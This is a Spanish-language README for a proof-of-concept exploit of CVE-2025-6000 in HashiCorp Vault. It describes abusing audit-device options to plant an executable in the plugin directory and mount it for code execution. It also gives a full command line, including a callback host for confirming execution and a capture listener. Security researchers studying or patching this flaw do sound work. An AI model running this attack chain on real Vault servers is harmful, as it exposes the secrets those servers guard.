
Prueba de concepto del exploit para CVE-2025-6000, una escalada de privilegios a RCE en los backends de auditoría de HashiCorp Vault, que permite la ejecución arbitraria de código con un token de root.
Prueba de concepto para CVE-2025-6000, una vulnerabilidad de escalada de privilegios a RCE en
los backends de auditoría de HashiCorp Vault. El dispositivo de auditoría permite que un llamador
privilegiado controle las opciones prefix, file_path y mode sin validación. Al
escribir una carga útil ejecutable en el plugin_directory de Vault, y luego registrarla
y montarla como plugin, un atacante con un token raíz puede ejecutar código arbitrario
en el host de Vault.
https://github.com/user-attachments/assets/f8d6c90a-b511-4e96-8e4d-718c7a765601
plugin_directory configurado.sys/audit, sys/plugins,
sys/mounts).python3 CVE-2025-6000.py <vault-host> <vault-port> --token <root-token> \
--socket-addr <ip:port Vault dials> \
--listen-port 9861 \
--callback-host <your-ip> --callback-port 8000 \
--cleanup
--socket-addr — dirección a la que Vault se conecta para el flujo de auditoría (tu IP:puerto VPN
o un endpoint TCP de ngrok).--listen-port — puerto local al que se vincula el servidor de captura.--callback-host / --callback-port — endpoint HTTP utilizado para confirmar la
ejecución.--cleanup — elimina los dispositivos de auditoría, el plugin y el montaje al final.Si la captura falla, el script recurre a un prompt manual de SHA256. Ejecuta -h para
todas las opciones.
Solo para pruebas de seguridad autorizadas, investigación y educación. Úsalo únicamente contra sistemas que poseas o para los que tengas permiso explícito por escrito para probar. Eres el único responsable del uso de este software; los autores no aceptan ninguna responsabilidad por uso indebido o daños. El acceso no autorizado a sistemas informáticos es ilegal.
MIT — consulta LICENSE.